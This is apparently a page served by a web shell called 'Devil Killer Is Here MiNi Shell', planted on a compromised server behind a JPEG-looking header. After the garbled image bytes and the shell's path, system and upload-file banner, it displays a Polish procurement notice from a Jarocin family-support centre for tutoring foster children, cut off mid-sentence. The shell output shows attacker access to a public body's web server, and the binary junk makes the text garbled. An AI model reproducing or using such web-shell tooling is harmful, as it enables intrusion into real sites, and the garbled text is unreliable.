JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240813/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240813/0045580201-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> USŁUGA WSPIERAJĄCA ROZWÓJ, KOMPENSUJĄCA OPÓŹNIENIA DZIECI I MŁODZIEŻY PRZEBYWAJĄCYCH W PIECZY ZASTĘPCZEJ – korepetycje - (na rok 2024)<br/>CZĘŚĆ I <br/>CZĘŚĆ II <br/>CZĘŚĆ III </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POWIATOWE CENTRUM POMOCY RODZINIE W JAROCINIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 250864238</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Dworcowa 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jarocin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">63-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL416 - Kaliski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 62-505-46-06</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">pcpr@pcprjarocin.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pcprjarocin.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ochrona socjalna</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> USŁUGA WSPIERAJĄCA ROZWÓJ, KOMPENSUJĄCA OPÓŹNIENIA DZIECI I MŁODZIEŻY PRZEBYWAJĄCYCH W PIECZY ZASTĘPCZEJ – korepetycje - (na rok 2024)<br/>CZĘŚĆ I <br/>CZĘŚĆ II <br/>CZĘŚĆ III </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-17a4361c-9e61-401e-83c8-a75a63272d9b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00455802</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-08-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00452592/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 USŁUGA WSPIERAJĄCA ROZWÓJ, KOMPENSUJĄCA OPÓŹNIENIA DZIECI I MŁODZIEŻY PRZEBYWAJĄCYCH W PIECZY ZASTĘPCZEJ – korepetycje</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> projekt pn. &#34;Wsparcie deinstytucjonalizacji pieczy zastępczej w podregionie kaliskim&#34;, realizowanym w ramach programu Fundusze Europejskie dla Wielkopolski 2021-2027, Priorytet 6: Fundusze europejskie dla Wielkopolski o silniejszym wymiarze społecznym (EFS+), współfinansowanego ze środków Europejskiego Funduszu Społecznego Plus (EFS+), nabór nr 7/FEWP.06.15-IZ.00-001/23 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-17a4361c-9e61-401e-83c8-a75a63272d9b <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między zamawiającym, a wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej tj. Platformy e-Zamówienia https://ezamowienia.gov.pl Korespondencja przesłana za pomocą dedykowanych formularzy nie może być szyfrowana. We wszelkiej korespondencji związanej z niniejszym postępowaniem zamawiający i wykonawcy posługują się numerem ogłoszenia (BZP).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto na Platformie e-Zamówienia. Wykonawca posiadający konto na Platformie ma dostęp do zakładek: Formularze do komunikacji oraz zakładki oferty/wnioski. 4) Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu zostały opisane w „Instrukcji użytkowania systemu” https://ezamowienia.gov.pl/pl/instrukcje/ oraz https://epzpygmggrsicd.blob.core.windows.net/pod/2021/10/Komunikacja-w-postepowaniu-3.2_20211016.pdf oraz Regulaminie Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl/pl/regulamin/ oraz informacje zamieszczone w zakładce „Centrum Pomocy”. <br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza).<br/>6) Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na Platformę.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">określone w SWZ w rozdz. IV</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">określone w SWZ w rozdz. IV</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DWR.3211.11.2024.FEW</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ I – korepetycje z matematyki<br/>Do obowiązków Wykonawcy/korepetytora należeć będą:<br/>a)	udzielenie korepetycji z matematyki, tj. udzielenie 80 godzin (zegarowych) indywidualnych korepetycji (spotkania indywidualne).<br/>b)	Prowadzenie dokumentacji z realizacji umowy, tj. sporządzanie sprawozdań <br/>z udzielonych korepetycji.<br/>c)	Usługa świadczona stacjonarnie, w dni robocze od poniedziałku do piątku, w godzinach dostosowanych do możliwości i potrzeb uczestników. W uzasadnionych przypadkach mogą to być inne terminy (np. weekendy).<br/>d) Usługę będą świadczyć osoby zaangażowane przez Wykonawcę posiadające niezbędne wykształcenie i min. 1 rok doświadczenia/praktyki zgodnie z nauczanym przedmiotem.<br/>e) Termin realizacji usługi: od dnia podpisania umowy do 30.11.2024 r.<br/>Pełen opis zamówienia znajduje się w załączniku nr 7 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80100000-5 - Usługi szkolnictwa podstawowego</p> <p class="mb-0">80200000-6 - Usługi szkolnictwa średniego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">2.	Wybór najkorzystniejszej oferty w każdej z części zamówienia nastąpi zgodnie z ustawą na podstawie powyższych kryteriów. Zamawiający zastosuje w ocenie zaokrąglenie wyników do dwóch miejsc po przecinku.<br/>Ocena ofert w poszczególnych kryteriach będzie dokonywana według następujących zasad: 1) Zasady oceny Kryterium „Cena”: Ocena będzie ustalana na podstawie ceny brutto, zgodnie z zał. nr 1 do SWZ, określona zostanie z dokładnością do dwóch miejsc po przecinku dla. Ocena ofert w kryterium ceny będzie obliczona wg wzoru: <br/>C= (Cmin/Co * 100 pkt) x W<br/>Gdzie: C – ocena w kryterium „cena oferty”<br/> Cmin - „cena oferty” najniższa proponowana spośród wszystkich złożonych w postępowaniu ofert niepodlegających odrzuceniu <br/>Co - cena oferty ocenianej W - waga w kryterium „cena oferty” <br/>2) Zasady oceny Kryterium „Doświadczenie osób prowadzących korepetycje”: Ocena będzie ustalana na podstawie zapisów formularza oferty oraz załączonych do oferty przedmiotowych środków dowodowych przedmiotu zamówienia, zgodnie z poniższymi zasadami:<br/> a) za zaoferowanie przez Wykonawcę specjalisty do realizacji zamówienia, który posiada udokumentowane doświadczenie w prowadzeniu zajęć z przedmiotu określonego w danej części zamówienia, Zamawiający przyzna punkty na następujących zasadach: <br/>− doświadczenie poniżej 2 lat nie mniej niż 1 rok - 15 pkt, <br/>− doświadczenie powyżej 2 lat do 3 lat - 20 pkt, <br/>− doświadczenie powyżej 3 lat do 5 lat - 30 pkt, <br/>− doświadczenie powyżej 5 lat i więcej - 40 pkt. <br/>b) w formularzu ofertowym Wykonawca podaje lata i pełne miesiące kalendarzowe doświadczenia (w formie liczb całkowitych) a do oferty dołącza przedmiotowe środki dowodowe opisane w rozdz. XX SWZ – weryfikujące kwalifikacje i doświadczenie. <br/>c) w sytuacji kiedy Wykonawca wskaże więcej niż jedną osobę do realizacji danej części zamówienia doświadczenie wszystkich wskazanych osób sumuje się, a następnie dzieli przez liczbę wskazanych osób - Wynik tego działania podlega ocenie w kryterium „Doświadczenie osób prowadzących korepetycje”. <br/>UWAGA: Wskazane osoby pod rygorem uznania oferty za niezgodną z warunkami zamówienia i jej odrzucenia muszą spełniać co najmniej minimalne warunki ustalone w rozdz. XIX – XXI SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób prowadzących korepetycje</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ II – korepetycje z j. angielskiego<br/>	Do obowiązków Wykonawcy/korepetytora należeć będą:<br/>a) udzielenie korepetycji z j. angielskiego, tj. udzielenie 80 godzin (zegarowych) indywidualnych korepetycji (spotkania indywidualne).<br/>b) Prowadzenie dokumentacji z realizacji umowy, tj. sporządzanie sprawozdań z udzielonych korepetycji.<br/>c) Usługa świadczona stacjonarnie, w dni robocze od poniedziałku do piątku, w godzinach dostosowanych do możliwości i potrzeb uczestników. W uzasadnionych przypadkach mogą to być inne terminy (np. weekendy).<br/>d) Usługę będą świadczyć osoby zaangażowane przez Wykonawcę posiadające niezbędne wykształcenie i min. 1 rok doświadczenia/praktyki zgodnie z nauczanym przedmiotem.<br/>e) Termin realizacji usługi: od dnia podpisania umowy do 30.11.2024 r.<br/>Pełen opis zamówienia znajduje się w załączniku nr 7 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80100000-5 - Usługi szkolnictwa podstawowego</p> <p class="mb-0">80200000-6 - Usługi szkolnictwa średniego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wybór najkorzystniejszej oferty w każdej z części zamówienia nastąpi zgodnie z ustawą na podstawie powyższych kryteriów. Zamawiający zastosuje w ocenie zaokrąglenie wyników do dwóch miejsc po przecinku.<br/>Ocena ofert w poszczególnych kryteriach będzie dokonywana według następujących zasad: 1) Zasady oceny Kryterium „Cena”: Ocena będzie ustalana na podstawie ceny brutto, zgodnie z zał. nr 1 do SWZ, określona zostanie z dokładnością do dwóch miejsc po przecinku dla. Ocena ofert w kryterium ceny będzie obliczona wg wzoru: <br/>C= (Cmin/Co * 100 pkt) x W<br/>Gdzie: C – ocena w kryterium „cena oferty”<br/> Cmin - „cena oferty” najniższa proponowana spośród wszystkich złożonych w postępowaniu ofert niepodlegających odrzuceniu <br/>Co - cena oferty ocenianej W - waga w kryterium „cena oferty” <br/>2) Zasady oceny Kryterium „Doświadczenie osób prowadzących korepetycje”: Ocena będzie ustalana na podstawie zapisów formularza oferty oraz załączonych do oferty przedmiotowych środków dowodowych przedmiotu zamówienia, zgodnie z poniższymi zasadami:<br/> a) za zaoferowanie przez Wykonawcę specjalisty do realizacji zamówienia, który posiada udokumentowane doświadczenie w prowadzeniu zajęć z przedmiotu określonego w danej części zamówienia, Zamawiający przyzna punkty na następujących zasadach: <br/>− doświadczenie poniżej 2 lat nie mniej niż 1 rok - 15 pkt, <br/>− doświadczenie powyżej 2 lat do 3 lat - 20 pkt, <br/>− doświadczenie powyżej 3 lat do 5 lat - 30 pkt, <br/>− doświadczenie powyżej 5 lat i więcej - 40 pkt. <br/>b) w formularzu ofertowym Wykonawca podaje lata i pełne miesiące kalendarzowe doświadczenia (w formie liczb całkowitych) a do oferty dołącza przedmiotowe środki dowodowe opisane w rozdz. XX SWZ – weryfikujące kwalifikacje i doświadczenie. <br/>c) w sytuacji kiedy Wykonawca wskaże więcej niż jedną osobę do realizacji danej części zamówienia doświadczenie wszystkich wskazanych osób sumuje się, a następnie dzieli przez liczbę wskazanych osób - Wynik tego działania podlega ocenie w kryterium „Doświadczenie osób prowadzących korepetycje”. <br/>UWAGA: Wskazane osoby pod rygorem uznania oferty za niezgodną z warunkami zamówienia i jej odrzucenia muszą spełniać co najmniej minimalne warunki ustalone w rozdz. XIX – XXI SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób prowadzących korepetycje</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ III – korepetycje w zakresie edukacji wczesnoszkolnej<br/>Do obowiązków Wykonawcy/korepetytora należeć będą:<br/>a) udzielenie korepetycji w zakresie edukacji wczesnoszkolnej, tj. udzielenie 45 godzin (zegarowych) indywidualnych korepetycji (spotkania indywidualne).<br/>b) Prowadzenie dokumentacji z realizacji umowy, tj. sporządzanie sprawozdań <br/>z udzielonych korepetycji.<br/>c) Usługa świadczona stacjonarnie, w dni robocze od poniedziałku do piątku, <br/>w godzinach dostosowanych do możliwości i potrzeb uczestników. <br/>W uzasadnionych przypadkach mogą to być inne terminy (np. weekendy).<br/>d) Usługę będą świadczyć osoby zaangażowane przez Wykonawcę posiadające niezbędne wykształcenie i min. 1 rok doświadczenia/praktyki zgodnie z nauczanym przedmiotem.<br/>e) Termin realizacji usługi: od dnia podpisania umowy do 30.11.2024 r.<br/>Pełen opis zamówienia znajduje się w załączniku nr 7 do zamówienia </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80100000-5 - Usługi szkolnictwa podstawowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wybór najkorzystniejszej oferty w każdej z części zamówienia nastąpi zgodnie z ustawą na podstawie powyższych kryteriów. Zamawiający zastosuje w ocenie zaokrąglenie wyników do dwóch miejsc po przecinku.<br/>Ocena ofert w poszczególnych kryteriach będzie dokonywana według następujących zasad: 1) Zasady oceny Kryterium „Cena”: Ocena będzie ustalana na podstawie ceny brutto, zgodnie z zał. nr 1 do SWZ, określona zostanie z dokładnością do dwóch miejsc po przecinku dla. Ocena ofert w kryterium ceny będzie obliczona wg wzoru: <br/>C= (Cmin/Co * 100 pkt) x W<br/>Gdzie: C – ocena w kryterium „cena oferty”<br/> Cmin - „cena oferty” najniższa proponowana spośród wszystkich złożonych w postępowaniu ofert niepodlegających odrzuceniu <br/>Co - cena oferty ocenianej W - waga w kryterium „cena oferty” <br/>2) Zasady oceny Kryterium „Doświadczenie osób prowadzących korepetycje”: Ocena będzie ustalana na podstawie zapisów formularza oferty oraz załączonych do oferty przedmiotowych środków dowodowych przedmiotu zamówienia, zgodnie z poniższymi zasadami:<br/> a) za zaoferowanie przez Wykonawcę specjalisty do realizacji zamówienia, który posiada udokumentowane doświadczenie w prowadzeniu zajęć z przedmiotu określonego w danej części zamówienia, Zamawiający przyzna punkty na następujących zasadach: <br/>− doświadczenie poniżej 2 lat nie mniej niż 1 rok - 15 pkt, <br/>− doświadczenie powyżej 2 lat do 3 lat - 20 pkt, <br/>− doświadczenie powyżej 3 lat do 5 lat - 30 pkt, <br/>− doświadczenie powyżej 5 lat i więcej - 40 pkt. <br/>b) w formularzu ofertowym Wykonawca podaje lata i pełne miesiące kalendarzowe doświadczenia (w formie liczb całkowitych) a do oferty dołącza przedmiotowe środki dowodowe opisane w rozdz. XX SWZ – weryfikujące kwalifikacje i doświadczenie. <br/>c) w sytuacji kiedy Wykonawca wskaże więcej niż jedną osobę do realizacji danej części zamówienia doświadczenie wszystkich wskazanych osób sumuje się, a następnie dzieli 